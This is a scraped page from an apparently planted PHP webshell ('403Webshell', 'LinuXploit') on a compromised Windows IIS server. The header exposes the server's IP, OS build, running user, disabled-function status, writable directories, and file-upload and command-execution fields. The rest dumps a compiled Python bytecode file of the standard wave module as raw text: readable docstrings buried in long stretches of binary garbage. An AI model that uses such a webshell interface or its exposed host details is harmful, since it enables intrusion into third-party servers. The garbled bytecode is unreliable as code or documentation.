403Webshell
Server IP : 121.121.20.254  /  Your IP : 216.73.217.141
Web Server : Microsoft-IIS/10.0
System : Windows NT WEB-SERVER 10.0 build 20348 (Windows Server 2022) AMD64
User : IUSR ( 0)
PHP Version : 8.3.28
Disable Function : NONE
MySQL : ON  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /Python315/Lib/__pycache__/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /Python315/Lib/__pycache__/wave.cpython-315.pyc
R
>lqj�dc���Qs]QHGs]PHs]PHs]PHs]PHs,QNsQQ\2s	]s
]sQsQs
Qs\QQ	2sQ
sQQ2sQ
Q2sQQ2sQQksP!)a`
Stuff to parse WAVE files.

Usage.

Reading WAVE files:
      f = wave.open(file, 'r')
where file is either the name of a file or an open file pointer.
The open file pointer must have methods read(), seek(), and close().
When the setpos() and rewind() methods are not used, the seek()
method is not  necessary.

This returns an instance of a class with the following public methods:
      getnchannels()  -- returns number of audio channels (1 for
                         mono, 2 for stereo)
      getsampwidth()  -- returns sample width in bytes
      getframerate()  -- returns sampling frequency
      getnframes()    -- returns number of audio frames
      getformat()     -- returns frame encoding (WAVE_FORMAT_PCM, WAVE_FORMAT_IEEE_FLOAT
                         or WAVE_FORMAT_EXTENSIBLE)
      getcomptype()   -- returns compression type ('NONE' for linear samples)
      getcompname()   -- returns human-readable version of
                         compression type ('not compressed' linear samples)
      getparams()     -- returns a namedtuple consisting of all of the
                         above in the above order
      readframes(n)   -- returns at most n frames of audio
      rewind()        -- rewind to the beginning of the audio stream
      setpos(pos)     -- seek to the specified position
      tell()          -- return the current position
      close()         -- close the instance (make it unusable)
The position returned by tell() and the position given to setpos()
are compatible and have nothing to do with the actual position in the
file.
The close() method is called automatically when the class instance
is destroyed.

Writing WAVE files:
      f = wave.open(file, 'w')
where file is either the name of a file or an open file pointer.
The open file pointer must have methods write(), tell(), seek(), and
close().

This returns an instance of a class with the following public methods:
      setnchannels(n) -- set the number of channels
      setsampwidth(n) -- set the sample width
      setframerate(n) -- set the frame rate
      setnframes(n)   -- set the number of frames
      setformat(format)
                      -- set the frame format. Only WAVE_FORMAT_PCM and
                         WAVE_FORMAT_IEEE_FLOAT are supported.
      setcomptype(type, name)
                      -- set the compression type and the
                         human-readable compression type
      setparams(tuple)
                      -- set all parameters at once
      tell()          -- return current position in output file
      writeframesraw(data)
                      -- write audio frames without patching up the
                         file header
      writeframes(data)
                      -- write audio frames and patch up the file header
      close()         -- patch up the file header and close the
                         output file
You should set the parameters before the first writeframesraw or
writeframes.  The total number of frames does not need to be set,
but when it is set to the correct value, the header does not have to
be patched up.
It is best to first set all parameters, perhaps possibly the
compression type, and then write audio frames using writeframesraw.
When all frames have been written, either call writeframes(b'') or
close() to patch up the sizes in the header.
The close() method is called automatically when the class instance
is destroyed.
)�
namedtuple�Error�	Wave_read�
Wave_writec��\sQs]\sQsP!)r�)�__name__�
__module__�__qualname__�__firstlineno__�__static_attributes__r��C:\Python315\\Lib\wave.pyrr\s��ri��s��8�q�_wave_paramsz7nchannels sampwidth framerate nframes comptype compnamec��[[U22o[][U2U2FD<o[U2FD)oVU**V#U*]*
U*
$J+	J>	UO2!��)�	bytearray�len�range�
take_bytes)�data�width�swapped_data�i�js&&   r
�	_byteswaprksa���S��Y�'�L�
�1�c�$�i��
'���u��A�.2�q�5�k�L�U��Q���*�+��(��"�"�$�$rc�X`�\sQs]usnQ	QksQsQsQ
QksQsQQks	Qs
QsUsP!)�_Chunkc�B�P
UmV mU%cQoLQoVmUO]2Um[UO2]6c[g[OUQ*UO]22]*Um	U%cUO]*
Um	]UmUOO2Um
P	UmP![Oc	[Pgh9h[[ 1cP
SmP!h9h)F�>�<�L)�closed�align�file�read�	chunknamer�EOFError�struct�unpack_from�	chunksize�error�	size_read�tell�offset�seekable�AttributeError�OSError)�selfr$r#�	bigendian�
inclheader�strflags&&&&& r
�__init__�_Chunk.__init__vs�������
���G��G��	����1�����t�~�~���"��N�	%�#�/�/����T�Y�Y�q�\�J�1�M�D�N��!�^�^�a�/�D�N����	!��)�)�.�.�*�D�K�!�D�M���|�|�	%���$�	%����(�	"�!�D�M�	"�s*�9C"�:D�"C?�6	C?�D�D�Dc��UO!)z*Return the name (ID) of the current chunk.)r&�r2s&r
�getname�_Chunk.getname�s���~�~�rc�x�UO%fUO2P	UmP!P!P	Smh9h)T)r"�skipr9s&r
�close�_Chunk.close�s0���{�{�{�
#��	�	��"���	��#���s�0�	9c��UO%c[Q2gUO%f[Q2gU]6XcVO*oLU]6XcVO
*oU]6fVO
6�c[gUOOUOU*]2VmP!)z�Seek to specified position into the chunk.
Default position is 0 (start of chunk).
If the file is not seekable, this will result in an error.
�I/O operation on closed filezcannot seek)
r"�
ValueErrorr/r1r,r*�RuntimeErrorr$�seekr.)r2�pos�whences&&&r
rD�_Chunk.seek�s����;�;�;��;�<�<��}�}�}��-�(�(��Q�;����&�C�
�q�[����&�C���7�c�N�N�*����	�	���t�{�{�S�(�!�,��rc�V�UO%c[Q2gUO!)rA)r"rBr,r9s&r
r-�_Chunk.tell�s!���;�;�;��;�<�<��~�~�rc��UO%c[Q2gUOUO6�cQ!U]6cUOUO*
oVOUO*
6�cUOUO*
oUOOU2oUO[
U2*UmUOUO6XchUO%cVUO]*%c=UOO]2oUO[
U2*UmU!)ziRead at most size bytes from the chunk.
If size is omitted or negative, read until the end
of the chunk.
rAr)r"rBr,r*r$r%rr#)r2�sizer�dummys&&  r
r%�_Chunk.read�s����;�;�;��;�<�<��>�>�T�^�^�+���!�8��>�>�D�N�N�2�D��.�.�4�>�>�1�1��>�>�D�N�N�2�D��y�y�~�~�d�#�����#�d�)�3����>�>�T�^�^�+��:�:�:��N�N�Q����I�I�N�N�1�%�E�!�^�^�c�%�j�8�D�N��rc�^�UO%c[Q2gUO%c�UOUO*
oUO
%c#UO]*%c
U]*oUOOU]2UOU*UmP!UOUO6cI[QUOUO*
2oUOU2oU%cJ][gP![cKrh9h)z�Skip the rest of the chunk.
If you are not interested in the contents of the chunk,
this method should be called so that the file points to
the start of the next chunk.
rAi )r"rBr/r*r,r#r$rDr1�minr%r')r2�nrLs&  r
r=�_Chunk.skip�s����;�;�;��;�<�<��=�=�=�	
��N�N�T�^�^�3���:�:�:�4�>�>�A�#5�#5��A��A��	�	���q�!�$�!%���!�!3�����n�n�t�~�~�-��D�$�.�.�4�>�>�9�:�A��I�I�a�L�E��5���	.���
��
�s#�.D�!D�:=D�	D,�(D,�+D,)r#r&r*r"r$r.r/r,)TTFr)���)
rrr	r
r6r:r>rDr-r%r=r�__classdictcell__��
__classdict__s@r
rrus-����!�2�#��&�
�.�rrc�`�\sQs]�snQsQsQsQsQsQs	Qs
QsQ	sQ
s
QsQsQ
sQsQsQsQsQsQsQsQsQsUsP!)ra�Variables used in this class:

These variables are available to the user though appropriate
methods of this class:
_file -- the open file with methods read(), close(), and seek()
          set through the __init__() method
_nchannels -- the number of audio channels
          available through the getnchannels() method
_nframes -- the number of audio frames
          available through the getnframes() method
_sampwidth -- the number of bytes per audio sample
          available through the getsampwidth() method
_framerate -- the sampling frequency
          available through the getframerate() method
_format -- frame format
          One of WAVE_FORMAT_PCM, WAVE_FORMAT_IEEE_FLOAT
          or WAVE_FORMAT_EXTENSIBLE available through
          getformat() method
_comptype -- the AIFF-C compression type ('NONE' if AIFF)
          available through the getcomptype() method
_compname -- the human-readable AIFF-C compression type
          available through the getcomptype() method
_soundpos -- the position in the audio stream
          available through the tell() method, set through the
          setpos() method

These variables are used internally only:
_fmt_chunk_read -- 1 iff the FMT chunk has been read
_data_seek_needed -- 1 iff positioned correctly in audio
          file for readframes()
_data_chunk -- instantiation of a chunk class for the DATA chunk
_framesize -- size of one frame in the file
c��PUm]Um[U]Q5UmUOO	2Q6wc[Q2gUOO
]2Q6wc[Q2g]UmPUm]Um	[UO]Q5oUO	2oUQ6XcUOU2]UmLTUQ6XcNUO%f[Q2gV mUOUO*Um]Um	LUO2J�UO%cUO%f[Q	2gP![cJ?h9h)
N)r3�RIFFz file does not start with RIFF id�WAVEznot a WAVE file�fmt �datazdata chunk before fmt chunkz#fmt chunk and/or data chunk missing)�_convert�	_soundposr�_filer:rr%�_fmt_chunk_read�_data_chunk�_data_seek_neededr'�_read_fmt_chunkr*�
_framesize�_nframesr=)r2r$�chunkr&s&&  r
�initfp�Wave_read.initfpsE����
�����D�a�0��
��:�:����7�*��:�;�;��:�:�?�?�1���(��)�*�*� �������%&�D�"�
��t�z�z�q�9���
�
��I��G�#��$�$�U�+�'(��$��g�%��+�+�+�� =�>�>�#(� � %���4�?�?� B��
�)*��&���J�J�L��#�#�#�4�+;�+;�+;��=�>�>�,<���
��
�s�E,�,	E;�6E;�:E;c��PUm[U[[[O
12%c[OUQ2oVmUOU2P!SO%cSO2g9h)N�rb�
�_i_opened_the_file�
isinstance�bytes�str�os�PathLike�builtins�openrfr>�r2�fs&&r
r6�Wave_read.__init__&sg��"&����a�%��b�k�k�2�3�3��
�
�a��&�A�&'�#�	��K�K��N��	��&�&�&����	����A%�%B
�9B
c�(�UO2P!�N�r>r9s&r
�__del__�Wave_read.__del__3����
�
�rc��U!rxrr9s&r
�	__enter__�Wave_read.__enter__6����rc�(�UO2P!rxry�r2�argss&*r
�__exit__�Wave_read.__exit__9r|rc��UO!rx)r^r9s&r
�getfp�Wave_read.getfp?s���z�z�rc�$�]Um]UmP!)�)rar]r9s&r
�rewind�Wave_read.rewindBs��!"�����rc�p�PUmUOoU%cPUmUO2P!P!rx)r^rkr>�r2r$s& r
r>�Wave_read.closeFs-����
��&�&���&*�D�#��J�J�L�rc��UO!rx)r]r9s&r
r-�Wave_read.tellM����~�~�rc��UO!rx)�
_nchannelsr9s&r
�getnchannels�Wave_read.getnchannelsP������rc��UO!rx)rdr9s&r
�
getnframes�Wave_read.getnframesSs���}�}�rc��UO!rx)�
_sampwidthr9s&r
�getsampwidth�Wave_read.getsampwidthVr�rc��UO!rx)�
_framerater9s&r
�getframerate�Wave_read.getframerateYr�rc��UO!rx��_formatr9s&r
�	getformat�Wave_read.getformat\����|�|�rc��UO!rx��	_comptyper9s&r
�getcomptype�Wave_read.getcomptype_r�rc��UO!rx��	_compnamer9s&r
�getcompname�Wave_read.getcompnamebr�rc	���[UO2UO2UO2UO	2UO2UO
22!rx)rr�r�r�r�r�r�r9s&r
�	getparams�Wave_read.getparamsesQ���D�-�-�/��1B�1B�1D��(�(�*�D�O�O�,=��'�'�)�4�+;�+;�+=�?�	?rc�f�U]6fVO6�c[Q2gVm]UmP!)rzposition not in range)rdrr]ra)r2rEs&&r
�setpos�Wave_read.setposjs+����7�c�M�M�)��/�0�0���!"��rc��UO%ceUOO]]2UOUO*oU%cUOOU]2]UmU]6XcQ!UOOVO*2oUO]6wc+[OQ6Xc[V0O2oUO%cU%cUOU2oUO[U2UOUO***UmU!)rr�big)
rar`rDr]rcr%r��sys�	byteorderrr\rr�)r2�nframesrErs&&  r
�
readframes�Wave_read.readframesps����!�!�!����!�!�!�Q�'��.�.�4�?�?�2�C��� � �%�%�c�1�-�%&�D�"��a�<�����$�$�W���%>�?���?�?�a��C�M�M�U�$:��T�?�?�3�D��=�=�=�T��=�=��&�D����#�d�)����$�/�/�8Y�*Z�Z����rc�^�[OQUO]22vUmUmUmq#UO[[[17c[QUO802g[OQUO]22]*oUO[6Xc�[OQUO]22vqVoUO]2o[U2]6c[gU[6wc&]PH:o	QU	OUQ50o
[U
2gU]*]*UmUO"%f[Q2gUO%f[Q2gUOUO"*UmQ	UmQ
UmP![Oc	[Pgh9h[Oc	[Pgh9h[Oc	[Pgh9h[ cQo
K�h9h)z<HHLLHzunknown format: z<Hz<HHLzunknown extended format: )�bytes_lezunknown extended format�bad sample width�bad # of channels�NONEznot compressed)r(r)r%r�r�r�r+r'�WAVE_FORMAT_PCM�WAVE_FORMAT_IEEE_FLOAT�WAVE_FORMAT_EXTENSIBLErr�KSDATAFORMAT_SUBTYPE_PCM�uuid�UUID�	Exceptionr�rcr�r�)r2re�dwAvgBytesPerSec�wBlockAlign�	sampwidth�cbSize�wValidBitsPerSample�
dwChannelMask�	SubFormatr��
subformat_msgs&&         r
rb�Wave_read._read_fmt_chunk�s���	%�\b�\n�\n�ow�y~�zD�zD�EG�zH�]I�Y�D�L�$�/�4�?�<L��<�<��1G�I_�`�`�����>�?�?�	%��*�*�4����A��?��B�I��<�<�1�1�
)�=C�=O�=O�PV�X]�Xb�Xb�cd�Xe�=f�:��]�!�J�J�r�N�	��y�>�B�&�"�N�'��4�4�>��&?��	�	�S\�	�@]�?^�$_�M��M�*�*�$�q�=�Q�.��������*�+�+������+�,�,��/�/�D�O�O�;������)����?�|�|�	%���$�	%���|�|�	%���$�	%���<�<�
)��D�(�
)��!�>�$=�M�>�sT�:F<�7-G�:A	G<�G<�H�<G�	G�G9�0	G9�<H�	H�	H,�&H,�+H,)r�r�r\r`rar^r_r�r�rcrkr�rdr�r])rrr	r
�__doc__rfr6rzr~r�r�r�r>r-r�r�r�r�r�r�r�r�r�r�rbrrSrTs@r
rr�st���� �D?�>���������������?�
#��*"*�"*rc��`�\sQsQsnQsPsQsQsQsQs	Qs
QsQ	sQ
s
QsQsQ
sQsQsQsQsQsQsQsQsQsQsQsQsQsQsQsQs Qs!Qs"Us#P!) r�a�Variables used in this class:

These variables are user settable through appropriate methods
of this class:
_file -- the open file with methods write(), close(), tell(), seek()
          set through the __init__() method
_comptype -- the AIFF-C compression type ('NONE' in AIFF)
          set through the setcomptype() or setparams() method
_compname -- the human-readable AIFF-C compression type
          set through the setcomptype() or setparams() method
_nchannels -- the number of audio channels
          set through the setnchannels() or setparams() method
_sampwidth -- the number of bytes per audio sample
          set through the setsampwidth() or setparams() method
_framerate -- the sampling frequency
          set through the setframerate() or setparams() method
_format -- frame format
          set through setformat() method
_nframes -- the number of audio frames written to the header
          set through the setnframes() or setparams() method

These variables are used internally only:
_datalength -- the size of the audio samples written to the header
_nframeswritten -- the number of frames actually written
_datawritten -- the size of the audio samples actually written
c��PUm[U[[[O
12%c[OUQ2oVmUOU2P!SO%cSO2g9h)N�wbrjrss&&r
r6�Wave_write.__init__�sg��"&����a�%��b�k�k�2�3�3��
�
�a��&�A�&'�#�	��K�K��N��	��&�&�&����	��rvc��VmPUm]Um[Um]Um]Um]Um]Um]Um	]Um
PUmP
UmP!rx)
r^r\r�r�r�r�r�rd�_nframeswritten�_datawritten�_datalength�_fact_sample_count_pos�_headerwrittenr�s&&r
rf�Wave_write.initfp�sY���
���
����&�����������
� ���������&*��#�#��rc�(�UO2P!rxryr9s&r
rz�Wave_write.__del__�r|rc��U!rxrr9s&r
r~�Wave_write.__enter__�r�rc�(�UO2P!rxryr�s&*r
r��Wave_write.__exit__�r|rc�r�UO%c[Q2gU]6c[Q2gVmP!)�0cannot change parameters after starting to writer�)r�rr�)r2�	nchannelss&&r
�setnchannels�Wave_write.setnchannels�s2�������J�K�K��q�=��+�,�,�#�rc�V�UO%f[Q2gUO!)znumber of channels not set)r�rr9s&r
r��Wave_write.getnchannels�s!�������4�5�5����rc���UO%c[Q2gUO[6XcUQ7c[Q2gLU]6fU]6�c[Q2gVmP!)r��.unsupported sample width for IEEE float formatr����)r�rr�r�r�)r2r�s&&r
�setsampwidth�Wave_write.setsampwidth�s^�������J�K�K��<�<�1�1���&��L�M�M�'�
��]�i�!�m��*�+�+�#�rc�V�UO%f[Q2gUO!)zsample width not set)r�rr9s&r
r��Wave_write.getsampwidths!�������.�/�/����rc��UO%c[Q2g[[U22oU]6:c[Q2gVmP!)r�zbad frame rate)r�r�int�roundr�)r2�	framerates&&r
�setframerate�Wave_write.setframerate	sA�������J�K�K���i�(�)�	���>��(�)�)�#�rc�V�UO%f[Q2gUO!)zframe rate not set)r�rr9s&r
r��Wave_write.getframerates!�������,�-�-����rc�N�UO%c[Q2gVmP!�r�)r�rrd)r2r�s&&r
�
setnframes�Wave_write.setnframess�������J�K�K��
rc��UO!rx�r�r9s&r
r��Wave_write.getnframes����#�#�#rc�~�UO%c[Q2gUQ7c[Q2gVmV mP!)r�zunsupported compression type)r�)r�rr�r�)r2�comptype�compnames&&&r
�setcomptype�Wave_write.setcomptypes8�������J�K�K��9�$��6�7�7�!��!�rc��UO%c[Q2gU[[17c[Q2gU[6Xc/UO%cUOQ7c[Q2gVmP!)r�zunsupported wave formatr�r�)r�rr�r�r�r�)r2�formats&&r
�	setformat�Wave_write.setformat&sb�������J�K�K��0�/�B�B��1�2�2��+�+�����D�O�O�[a�Da��H�I�I��rc��UO!rxr�r9s&r
r��Wave_write.getformat/r�rc��UO!rxr�r9s&r
r��Wave_write.getcomptype2r�rc��UO!rxr�r9s&r
r��Wave_write.getcompname5r�rc�V�UO%c[Q2g[U2]6XcUvq#qEqg[oLUvq#qEqgoUO	U2UOU2UO
U2UOU2UOU2UOVg2P!r)
r�rrr�r�rr�r�rr)	r2�paramsr�r�r�r�r	r
rs	&&       r
�	setparams�Wave_write.setparams8s��������J�K�K��v�;�!��KQ�H�I�)�h�$�F�SY�P�I�)�h�&����)�$����v�����)�$����)�$����� �����,rc��UO%c%UO%cUO%f[Q2g[	UOUOUOUO
UOUO2!)znot all parameters set)r�r�r�rrrdr�r�r9s&r
r��Wave_write.getparamsGsY������d�o�o�o�T�_�_�_��0�1�1��D�O�O�T�_�_�d�o�o��m�m�T�^�^�T�^�^�=�	=rc��UO!rxrr9s&r
r-�Wave_write.tellMrrc�h�[U[[12%f[U2O	Q2oUO[
U22[
U2UOUO**oUO%cUOU2oUO]6wc+[OQ6Xc[VO2oUOOU2U9O[
U2*
tmUO U*UmP!)�Br�)rlrmr�
memoryview�cast�_ensure_header_writtenrr�r�r\r�r�rr^�writer�r�)r2rr�s&& r
�writeframesraw�Wave_write.writeframesrawPs����$��	� 2�3�3��d�#�(�(��-�D��#�#�C��I�.��d�)����$�/�/� A�B���=�=�=��=�=��&�D��?�?�a��C�M�M�U�$:��T�?�?�3�D��
�
��������S��Y�&��#�3�3�g�=��rc��UOU2UOUO6wcUO2P!P!rx)r%r�r��_patchheader)r2rs&&r
�writeframes�Wave_write.writeframes]s5�����D�!����t�0�0�0�����1rc��UO%c�UO]2UO]*%cUOOQ2UOUO6wcUO2UOO
2PUmUOoU%cPUmUO2P!P!PSmSOoS%cPSmSO2hh9h)r�)	r^r#r�r$r�r(�flushrkr>r�s& r
r>�Wave_write.closebs���
	��z�z�z��+�+�A�.��$�$�q�(�(��J�J�$�$�W�-��#�#�t�'8�'8�8��%�%�'��
�
� � �"��D�J��*�*�D��*.��'��
�
�����D�J��*�*�D��*.��'��
�
���s!�C�)C�5C�5*C�D
�1D
c��UO%fkUO%f[Q2gUO%f[Q2gUO%f[Q2gUOU2P!P!)z# channels not specifiedzsample width not specifiedzsampling rate not specified)r�r�rr�r��
_write_header)r2�datasizes&&r
r#�!Wave_write._ensure_header_writtenvs`���"�"�"��?�?�?��6�7�7��?�?�?��8�9�9��?�?�?��9�:�:����x�(�#rc�*�UO[6H!rx)r�r�r9s&r
�_needs_fact_chunk�Wave_write._needs_fact_chunk�s���|�|�5�5�5rc�Z�UO%cPgUOOQ2UO%f)VOUO
**UmUOUO*UO
*UmUOO2UmUO2o]$U%c]L]*oUOO[OQV0O*UO]**QQ]UOUOUOUOUO*UO
*UOUO
*UO
]*22U%c�UOOQ2UOO[OQ]22UOO2UmUOO[OQUO22UOOQ2UOd UOO2UmUOO[OQUO22P	UmP![[1cPSmCKMh9h[[1cPSmK�h9h)rXz
<L4s4sLHHLLHHrYrZsfact�<Lr[)r�r^r$rdr�r�r�r-�_form_length_posr0r1r4r(�packr�r�r��_data_length_pos)r2�
initlength�has_fact�header_overheads&&  r
r0�Wave_write._write_header�s+���&�&�&�&�&��
�
����!��}�}�}�&�?�?�T�_�_�+L�M�D�M��=�=�4�?�?�:�T�_�_�L���	)�$(�J�J�O�O�$5�D�!��)�)�+���h��A�6���
�
������_��.�.�.�$�2B�2B�Q�2F�G��RY�[]��L�L�$�/�/�4�?�?��O�O�d�o�o�-����?��O�O�d�o�o�-��O�O�a��!�	"���J�J���W�%��J�J���V�[�[��q�1�2�
3�.2�j�j�o�o�.?��+�
�J�J���V�[�[��t�}�}�=�>��
�
����!�� � �,�$(�J�J�O�O�$5�D�!��
�
������T�4�+;�+;�<�=�"����-��(�	)�$(�D�!�	)��#�G�,�
3�.2��+�
3�s0�K0�L�0L�L�L�L*�L*�)L*c��UO%fPgUOUO6XcP!UOO	2o]$UO2%c]L]*oUOO
UO]2UOO[OQV O*UO]**22UOd�UOO
UO]2UOUOUO**oUOO[OQU22UOO
UO]2UOO[OQUO22UOO
U]2UOUmP!)Nr7)r�r�r�r^r-r4rDr8r$r(r9r�r�r�r:)r2�curposr=r�s&   r
r(�Wave_write._patchheader�s^���"�"�"�"�"����� 0� 0�0�������"���d�&<�&<�&>�&>��A�F���
�
����-�-�q�1��
�
������T�?�=N�=N�+N�RV�Rc�Rc�fg�Rg�+h�i�j��&�&�2��J�J�O�O�D�7�7��;��'�'�D�O�O�d�o�o�,M�N�G��J�J���V�[�[��w�7�8��
�
����-�-�q�1��
�
������T�4�+<�+<�=�>��
�
�����"��,�,��r)r�r�r\r:r�r�r�r^r8r�r�r�rkr�rdr�r�)$rrr	r
r�r^r6rfrzr~r�r�r�r�r�r�r�rr�rrr�r�r�rr�r-r%r)r>r#r4r0r(rrSrTs@r
rr�s������6
�E�
�$����$��
$��
$��
 �
$�"�����
-�=�$�>� �
�()�6�#�@-�-rc��Ue"[UQ2%cUOoLQoUQ7c[U2!UQ7c[U2![	Q2g)N�moderiz$mode must be 'r', 'rb', 'w', or 'wb')�rri)�wr�)�hasattrrCrrr)rtrCs&&r
rrrr�sR���|��1�f����6�6�D��D��{����|��	
��	��!�}���:�;�;r)rrrrrr�r�r�)N�b�hNrrx)r��collectionsrrqror(r��__all__r�rr�r�r�r��_array_fmtsrrrrrrrrrr
�<module>rLs���H�T#��	�
�
���	�I�	�������X��'���.�N�P��%�l�l�^C*�C*�LH-�H-�V<r

Youez - 2016 - github.com/yon3zu
LinuXploit